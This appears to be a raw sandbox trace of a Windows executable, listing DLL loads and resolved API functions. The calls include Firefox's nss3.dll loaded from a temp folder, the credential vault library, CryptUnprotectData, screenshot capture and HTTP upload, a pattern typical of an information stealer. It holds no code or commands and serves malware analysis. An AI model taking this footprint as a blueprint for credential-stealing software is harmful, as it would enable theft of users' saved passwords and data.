Load shell32.dll base_address = 0x75fd0000 True 1
Fn
Load ntdll.dll base_address = 0x77130000 True 1
Fn
Load wininet.dll base_address = 0x753d0000 True 1
Fn
Load C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\nss3.dll base_address = 0x73a90000 True 1
Fn
Load api-ms-win-core-synch-l1-2-0 base_address = 0x0 False 1
Fn
Load kernel32 base_address = 0x0 False 1
Fn
Load kernel32 base_address = 0x76c20000 True 1
Fn
Load api-ms-win-core-fibers-l1-1-1 base_address = 0x0 False 1
Fn
Load vaultcli.dll base_address = 0x73500000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 5
Fn
Get Handle c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe base_address = 0x400000 True 2
Fn
Get Handle wininet.dll base_address = 0x0 False 1
Fn
Get Handle c:\windows\syswow64\api-ms-win-core-synch-l1-2-0.dll base_address = 0x74650000 True 1
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocalTime, address_out = 0x76c35aa6 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessId, address_out = 0x76c5cf04 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessWorkingSetSize, address_out = 0x76cbe359 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UpdateResourceW, address_out = 0x76cc3475 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FatalExit, address_out = 0x76cb2d37 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DuplicateHandle, address_out = 0x76c31886 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReadFile, address_out = 0x76c33ed3 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetEndOfFile, address_out = 0x76c4ce2e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x76c33f5c True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSizeEx, address_out = 0x76c359e2 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetThreadPriorityBoost, address_out = 0x76cb43cf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateThread, address_out = 0x76c37a2f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryW, address_out = 0x76c3492b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeA, address_out = 0x76c4ef75 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalAlloc, address_out = 0x76c3588e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x76c3110c True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessIoCounters, address_out = 0x76cb3116 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x76c353c6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointer, address_out = 0x76c317d1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x76c310ff True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSetInformation, address_out = 0x76c35651 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapCreate, address_out = 0x76c34a2d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetHandleCount, address_out = 0x76c3cb29 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedIncrement, address_out = 0x76c31400 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedDecrement, address_out = 0x76c313f0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = InitializeAcl, address_out = 0x74d545cd True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = MapGenericMask, address_out = 0x74d67a73 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = LookupPrivilegeNameW, address_out = 0x74d81fab True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = ReportEventW, address_out = 0x74d4c839 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = EnumEnhMetaFile, address_out = 0x75af5948 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = GetEnhMetaFileHeader, address_out = 0x75af59f0 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SetMapperFlags, address_out = 0x75af2613 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = StretchDIBits, address_out = 0x75ae7435 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SwapBuffers, address_out = 0x75b159fb True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SetGraphicsMode, address_out = 0x75aec182 True 1
Fn
Get Address c:\windows\syswow64\msimg32.dll function = TransparentBlt, address_out = 0x74061320 True 1
Fn
Get Address c:\windows\syswow64\msimg32.dll function = AlphaBlend, address_out = 0x74061210 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMenuInfo, address_out = 0x74f7c151 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadImageA, address_out = 0x74f68455 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DestroyIcon, address_out = 0x74f649b2 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = EndPaint, address_out = 0x74f61341 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetPropA, address_out = 0x74f67b5a True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CopyImage, address_out = 0x74f64a09 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = FindWindowW, address_out = 0x74f598fd True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DrawTextExW, address_out = 0x74f6149e True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = BeginPaint, address_out = 0x74f61361 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SetScrollRange, address_out = 0x74f7d50b True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetDC, address_out = 0x74f572c4 True 2
Fn
Get Address c:\windows\syswow64\user32.dll function = SetPropA, address_out = 0x74f6822c True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PeekMessageA, address_out = 0x74f65f74 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ShowScrollBar, address_out = 0x74f64162 True 1
Fn
Get Address c:\windows\syswow64\winhttp.dll function = WinHttpQueryHeaders, address_out = 0x7400ba51 True 1
Fn
Get Address c:\windows\syswow64\winhttp.dll function = WinHttpQueryAuthSchemes, address_out = 0x74034101 True 1
Fn
Get Address c:\windows\syswow64\winhttp.dll function = WinHttpCloseHandle, address_out = 0x74002c01 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x76c349d7 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x76c3435f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x76c31b00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSection, address_out = 0x77162c42 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalFree, address_out = 0x76c32d3c True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalAlloc, address_out = 0x76c3168c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersion, address_out = 0x76c34467 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetThreadLocale, address_out = 0x76c335cf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoA, address_out = 0x76c30e00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x76c314b1 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoA, address_out = 0x76c4d5e5 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineA, address_out = 0x76c351a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 2
Fn
Get Address c:\windows\syswow64\user32.dll function = GetKeyboardType, address_out = 0x74f99ac4 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxA, address_out = 0x74fafd1e True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CharNextA, address_out = 0x74f57a1b True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExA, address_out = 0x74d548ef True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExA, address_out = 0x74d54907 True 2
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x74d5469d True 2
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SysFreeString, address_out = 0x75223e59 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SysReAllocStringLen, address_out = 0x75227810 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SysAllocStringLen, address_out = 0x752245d2 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x76c31245 True 2
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegEnumKeyA, address_out = 0x74d6a299 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = FreeSid, address_out = 0x74d5412e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalUnlock, address_out = 0x76c4cfdf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalLock, address_out = 0x76c4d0a7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemInfo, address_out = 0x76c349ca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileAttributesW, address_out = 0x76c31b18 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x76c354ee True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x76c34435 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x76c34442 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileW, address_out = 0x76c389b3 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryW, address_out = 0x76c34259 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileW, address_out = 0x76c5830d True 2
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SelectObject, address_out = 0x75ae4f70 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = DeleteObject, address_out = 0x75ae5689 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = DeleteDC, address_out = 0x75ae58b3 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = CreateCompatibleDC, address_out = 0x75ae54f4 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = CreateCompatibleBitmap, address_out = 0x75ae5f49 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = BitBlt, address_out = 0x75ae5ea6 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ReleaseDC, address_out = 0x74f57446 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetSystemMetrics, address_out = 0x74f57d2f True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CharToOemBuffA, address_out = 0x74f6b1b0 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleInitialize, address_out = 0x755fefd7 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoCreateInstance, address_out = 0x75629d0b True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x749dc544 True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptUnprotectData, address_out = 0x759e5a7f True 1
Fn
Get Address c:\windows\syswow64\crtdll.dll function = wcscmp, address_out = 0x6c25032a True 1
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll function = GdiplusStartup, address_out = 0x73e45600 True 1
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll function = GdiplusShutdown, address_out = 0x73e456be True 1
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll function = GdipCreateBitmapFromHBITMAP, address_out = 0x73e56671 True 1
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll function = GdipGetImageEncodersSize, address_out = 0x73e62203 True 1
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll function = GdipGetImageEncoders, address_out = 0x73e6228c True 1
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll function = GdipDisposeImage, address_out = 0x73e54cc8 True 1
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll function = GdipSaveImageToStream, address_out = 0x73e54153 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CreateStreamOnHGlobal, address_out = 0x7560363b True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = GetHGlobalFromStream, address_out = 0x756041d5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExpandEnvironmentStringsW, address_out = 0x76c34173 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameW, address_out = 0x76c3dd0e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalMemoryStatus, address_out = 0x76c38b6d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSize, address_out = 0x76c3196e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateMutexA, address_out = 0x76c34c6b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReleaseMutex, address_out = 0x76c3111e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentDirectoryW, address_out = 0x76c35611 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetEnvironmentVariableW, address_out = 0x76c389f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableW, address_out = 0x76c31b48 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetCurrentDirectoryW, address_out = 0x76c41260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalMemoryStatusEx, address_out = 0x76c5d4c4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32FirstW, address_out = 0x76c58baf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32NextW, address_out = 0x76c5896c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetDllDirectoryW, address_out = 0x76cb004f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeZoneInformation, address_out = 0x76c3465a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RemoveDirectoryW, address_out = 0x76cb44cf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalDriveStringsA, address_out = 0x76c3e4dc True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x76c3103d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameW, address_out = 0x74d5157a True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCreateKeyExW, address_out = 0x74d540fe True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x74d546ad True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x74d5468d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = AllocateAndInitializeSid, address_out = 0x74d540e6 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = LookupAccountSidA, address_out = 0x74d81daa True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CreateProcessAsUserW, address_out = 0x74d4c592 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CheckTokenMembership, address_out = 0x74d4df04 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyW, address_out = 0x74d52459 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegEnumKeyW, address_out = 0x74d5445b True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegEnumValueW, address_out = 0x74d548cc True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptAcquireContextA, address_out = 0x74d491dd True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptCreateHash, address_out = 0x74d4df4e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptHashData, address_out = 0x74d4df36 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGetHashParam, address_out = 0x74d4df7e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptDestroyHash, address_out = 0x74d4df66 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptReleaseContext, address_out = 0x74d4e124 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = EnumDisplayDevicesW, address_out = 0x74f7e567 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = wvsprintfA, address_out = 0x74f6aad3 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetKeyboardLayoutList, address_out = 0x74f62e69 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x75ff1e46 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = RtlComputeCrc32, address_out = 0x771effc1 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenA, address_out = 0x753ff18e True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetConnectA, address_out = 0x753f49e9 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpOpenRequestA, address_out = 0x753f4c7d True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpAddRequestHeadersA, address_out = 0x753edcd2 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpSendRequestA, address_out = 0x754618f8 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetReadFile, address_out = 0x753eb406 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetCloseHandle, address_out = 0x753eab49 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetCrackUrlA, address_out = 0x753dd075 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetSetOptionA, address_out = 0x753e75e8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitOnceExecuteOnce, address_out = 0x76c4d627 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventExW, address_out = 0x76cb410b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreW, address_out = 0x76c4ca5a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x76cb4195 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x76c4ee7e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x7717441c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x7719c50e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x7719c381 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x76c4f088 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x771805d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x7719ca24 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x77150b8c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x7720fde8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x771a1e1d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x76cacd11 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount64, address_out = 0x76c4eee0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileInformationByHandleEx, address_out = 0x76c4c78f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileInformationByHandle, address_out = 0x76c5cbfc True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimePreciseAsFileTime, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeConditionVariable, address_out = 0x77168456 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WakeConditionVariable, address_out = 0x771d7de4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WakeAllConditionVariable, address_out = 0x7719409d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SleepConditionVariableCS, address_out = 0x76cb4b32 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeSRWLock, address_out = 0x77168456 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = AcquireSRWLockExclusive, address_out = 0x771629f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TryAcquireSRWLockExclusive, address_out = 0x77174892 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReleaseSRWLockExclusive, address_out = 0x771629ab True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SleepConditionVariableSRW, address_out = 0x76cb4b74 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWork, address_out = 0x76c4ee45 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SubmitThreadpoolWork, address_out = 0x771a8491 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWork, address_out = 0x7719d8e2 True 1
Fn
